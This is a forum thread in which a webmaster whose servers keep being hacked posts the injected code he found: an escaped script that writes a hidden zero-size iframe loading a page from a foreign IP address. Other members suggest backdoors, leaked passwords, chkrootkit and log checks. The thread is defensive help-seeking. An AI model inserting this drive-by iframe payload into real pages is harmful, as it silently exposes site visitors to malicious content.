![]() |
![]() |
![]() |
|
|
#1 (permalink) |
|
I love AskDamageX.com
Join Date: Jan 2006
Posts: 66
|
Ok, I got three different servers hosted on webair, and all three are getting hacked. this is what I see when I view source.
<SCRIPT> s=unescape("%3Ciframe%20src%3D%22http%3A//58.65.234.9/~momo/traffic/index.php%22%20WIDTH%3D%220%25%22%20HEIGHT%3D%220% 25%22%20MARGINHEIGHT%3D%220%22%20MARGINWIDTH%3D%22 0%22%20SCROLLING%3D%22auto%22%20frameborder%3D%220 %22%20NORESIZE%3E%3C/iframe%3E");document.writeln(s);document.close(); </SCRIPT> But I can't see where it is coming from. All my software is updated. the ftp passwords have all been changed and ssh is turned off except for the access from webair. I use comus thumbs and at3, both free scripts, both are updated. So, i think the boxes are pretty much locked down tight, and I am now assuming there is some kind of script inside some kind of shell on my servers which writes this iframe into my index page every couple of hours. Is anyone familiar with this? has anyone seen another post where this was successfully removed? Anything? I'll take any leads I can get. Thanks
__________________
Traffic Is Life! Trade Traffic With My Toplists |
|
|
|
|
|
#2 (permalink) | |
|
Who does #2 work for?
Join Date: Oct 2005
Posts: 11,033
|
FYI I got the following warning just from visiting your signup page in your sig:
Quote:
__________________
110 Traffic Trades | Contextually relevant trades wanted - 55 sites | Porn Reviews | Deutscher Porno Report >>Draupnir Traffic Trading Script This is the most automated trade solution available. ![]() ![]() ![]()
|
|
|
|
|
|
|
#3 (permalink) |
|
I love AskDamageX.com
Join Date: Jan 2006
Posts: 66
|
Yeah, this bastard is killing me. i can't get rid of him/her. I got a tech working on it, but I thought I would hit up the real resource and see if i could dig up some leads.
I know about the webmasters page. It's getting in everywhere.
__________________
Traffic Is Life! Trade Traffic With My Toplists |
|
|
|
|
|
#4 (permalink) |
|
I like money
Join Date: Nov 2006
Location: Canada
Posts: 1,418
|
what happened to me might have been different... but you might want to check out this thread
http://www.askdamagex.com/t21776-we-...urity-now.html there is another one kicking around.. but if I were you ... start with taking the exploit out of your templates... and then chmod'ing them to 444 (read-only) |
|
|
|
|
|
#5 (permalink) |
|
I love AskDamageX.com
Join Date: Jan 2006
Posts: 66
|
Thanks, but i already saw that post. It's not the same.
I have had my templates at 444 for several months because of the last time I got hacked. I don't find any scripts in my template files. that's what is so confusing. I don't know where it is coming from.
__________________
Traffic Is Life! Trade Traffic With My Toplists |
|
|
|
|
|
#8 (permalink) | |
|
Doh
Join Date: Oct 2006
Location: Niagara, ON
Posts: 3,379
|
Quote:
__________________
Free and Paid, Trade Expert 2.0 is OUT. Now with a support forum. Great Deals Right Now, Dirt Cheap!!!!
|
|
|
|
|
|
|
#10 (permalink) | |
|
Doh
Join Date: Oct 2006
Location: Niagara, ON
Posts: 3,379
|
Quote:
![]()
__________________
Free and Paid, Trade Expert 2.0 is OUT. Now with a support forum. Great Deals Right Now, Dirt Cheap!!!!
|
|
|
|
|
|
|
#11 (permalink) | |
|
Serious Contributor
Join Date: Dec 2005
Location: Bulgaria
Posts: 10,729
|
Quote:
__________________
Biggest NOskim Network open for Trades/Linkexchanges 500+ Text, TGP, MGP and Link Sites for Trade! All Linkexchanges are autoapproved! Linkexchanges here - Small Traffic Trades - Thunder-Ball Profil |
|
|
|
|
|
|
#13 (permalink) |
|
Serious Contributor
Join Date: Dec 2005
Location: Buenos Aires
Posts: 1,250
|
http://www.chkrootkit.org/
Try downloading and running that on your server. It's a little old, but it checks for a shitload of stuff and does it pretty quickly. Make sure you read the documentation though, some things can cause a false positive.
__________________
The Filthy Few - TGP Traffic And Hardlinks
MILF / Teen / Lesbian / Amateur / Hardcore / Big Boobs Signup Forms Always Open! |
|
|
|
|
|
#14 (permalink) |
|
I'm just a girl
Join Date: Oct 2005
Location: On the razor's edge
Posts: 4,394
|
And a safe server never hurts
![]()
__________________
aDigital-fantasy Blog & Free Wallpapers |
|
|
|
|
|
#15 (permalink) |
|
I love AskDamageX.com
Join Date: Jan 2006
Posts: 66
|
Thanks guys! I will let you know when i figure this out. that chkrootkit looks like it might be worth a shot. What I need is a server Guru if anyone knows a god for hire.
__________________
Traffic Is Life! Trade Traffic With My Toplists |
|
|
|
|
|
#16 (permalink) | |
|
Serious Contributor
Join Date: Feb 2007
Location: i dont know
Posts: 855
|
Quote:
passwords been changed before another hack. so i think it about 90% possiblity what guy have something installed at his pc what sending new passes etc to person who hacking these sites.
__________________
LONGBUCKS-Teen, Mature, Reality, Gay sites. Free hosting. FHGs. Free content.Icq - 313-882-945 Webmaster friendly high recommended programs: RoyalCash-Teen ProfitX -Video SmokinCash-Amateur,Lesbo,Squirting |
|
|
|
|
|
|
#17 (permalink) | |
|
Doh
Join Date: Oct 2006
Location: Niagara, ON
Posts: 3,379
|
Quote:
__________________
Free and Paid, Trade Expert 2.0 is OUT. Now with a support forum. Great Deals Right Now, Dirt Cheap!!!!
|
|
|
|
|
|
|
#18 (permalink) | |
|
Serious Contributor
Join Date: Feb 2007
Location: i dont know
Posts: 855
|
Quote:
__________________
LONGBUCKS-Teen, Mature, Reality, Gay sites. Free hosting. FHGs. Free content.Icq - 313-882-945 Webmaster friendly high recommended programs: RoyalCash-Teen ProfitX -Video SmokinCash-Amateur,Lesbo,Squirting |
|
|
|
|
|
|
#19 (permalink) |
|
The dawg of all dawgs
Join Date: Oct 2005
Location: Marbella, Spain
Posts: 2,774
|
sounds to me that the first hack left them with a backdoor on the box, could also be outdated server software.
any word from webair on what might cause it? any logfiles they got on the box that might be of help?
__________________
For trades go to : MGPteam.com Trade scripts : Trade Pulse - ePowerTrader Traffic brokers : Traffic shop (new) - Traffic holder |
|
|
|
|
|
#20 (permalink) | |
|
Serious Contributor
Join Date: Oct 2005
Location: Argentina
Posts: 2,154
|
Quote:
![]()
__________________
Powered by ATX 2 (multiniches) >> SuperDiosas (trade) | MamitaLinda (trade) | AfterhourTeens (trade) Powered by TradePulse >> MILF Hero (milf trade) | SexyNudeGirlfriends (gf trade) | LatinasNudes (latin trade) More Trades: http://www.trafficators.com |
|
|
|
|
![]() |
| Thread Tools | |
|
|